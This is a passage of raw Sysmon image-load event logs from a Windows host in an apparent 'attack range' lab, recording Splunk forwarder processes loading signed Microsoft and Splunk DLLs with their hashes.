Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5E1E827FF5B9946B963A3B1410118CE,SHA256=C88697A912F309B191FBF790BE8952D18313F197D5B3B3C6226F26D7650A65C4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099229Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099228Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099227Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:46.053{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid 734700x800000000000000099337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146,IMPHASH=F67CBD9561C1FEF51B817BA184E81D2EtrueMicrosoft WindowsValid 734700x800000000000000099336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.631{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1A,IMPHASH=E7FD2920222985E31019D022BB39EFBEtrueMicrosoft WindowsValid 734700x800000000000000099335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.490{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.5006 (rs1_release.220301-1704)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33trueMicrosoft WindowsValid 734700x800000000000000099326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.475{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000099318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000099317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000099316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000099315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000099313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000099312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000099311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27,IMPHASH=B01B7830101BC0D5FBDE4FFE2B170CF7trueMicrosoft WindowsValid 734700x800000000000000099309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000099308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000099307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000099306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000099305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9,IMPHASH=3C043C6FF0F62DAEB8819606F79C5ECCtrueMicrosoft WindowsValid 734700x800000000000000099304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000099303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000099302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000099301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B,IMPHASH=98738BA55485CCA932F6D222F47FFC55trueMicrosoft WindowsValid 734700x800000000000000099300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759trueMicrosoft WindowsValid 734700x800000000000000099299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 734700x800000000000000099298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000099297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:47.459{326FD73D-C0EF-6294-3A0B-000000005502}4768C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.5006 